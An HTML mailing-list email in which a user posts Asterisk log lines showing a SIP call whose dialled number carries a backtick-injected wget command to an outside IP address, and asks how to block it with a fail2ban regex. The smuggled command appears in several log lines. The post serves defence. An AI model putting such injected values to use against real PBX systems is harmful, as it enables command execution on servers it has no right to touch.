<html><head><style type='text/css'>p { margin: 0; }</style></head><body><div style='font-family: Times New Roman; font-size: 12pt; color: #000000'>I have seen this recently in my logs as well <br><br>[2011-09-10 20:34:33] VERBOSE[14939] logger.c:&nbsp;&nbsp;&nbsp;&nbsp; -- Executing [00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@from-sip-external:1] NoOp("SIP/5060-0000002c", "Received incoming SIP connection from unknown peer to 00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`") in new stack<br>[2011-09-10 20:34:33] VERBOSE[14939] logger.c:&nbsp;&nbsp;&nbsp;&nbsp; -- Executing [00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@from-sip-external:2] Set("SIP/5060-0000002c", "DID=00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`") in new stack<br>[2011-09-10 20:34:33] VERBOSE[14939] logger.c:&nbsp;&nbsp;&nbsp;&nbsp; -- Executing [00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@from-sip-external:3] Goto("SIP/5060-0000002c", "s,1") in new stack<br>[2011-09-10 20:34:33] VERBOSE[14939] logger.c:&nbsp;&nbsp;&nbsp;&nbsp; -- Goto (from-sip-external,s,1)<br>[2011-09-10 20:34:33] VERBOSE[14939] logger.c:&nbsp;&nbsp;&nbsp;&nbsp; -- Executing [s@from-sip-external:1] GotoIf("SIP/5060-0000002c", "0?from-trunk,00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`,1") in new stack<br>[2011-09-10 20:34:33] VERBOSE[14939] logger.c:&nbsp;&nbsp;&nbsp;&nbsp; -- Goto (from-sip-external,//91.223.89.94/V.php`,1)<br><br>So can this be blocked via fail2ban and by adding a new REGEX ? <br><br><div><span name="x"></span>Thanks<br><br>Saqib<br><br></div></div><br />-- 
<br />This message has been scanned for viruses and
<br />dangerous content by
<a href="http://www.mailscanner.info/"><b>MailScanner</b></a>, and is
<br />believed to be clean.
</body></html>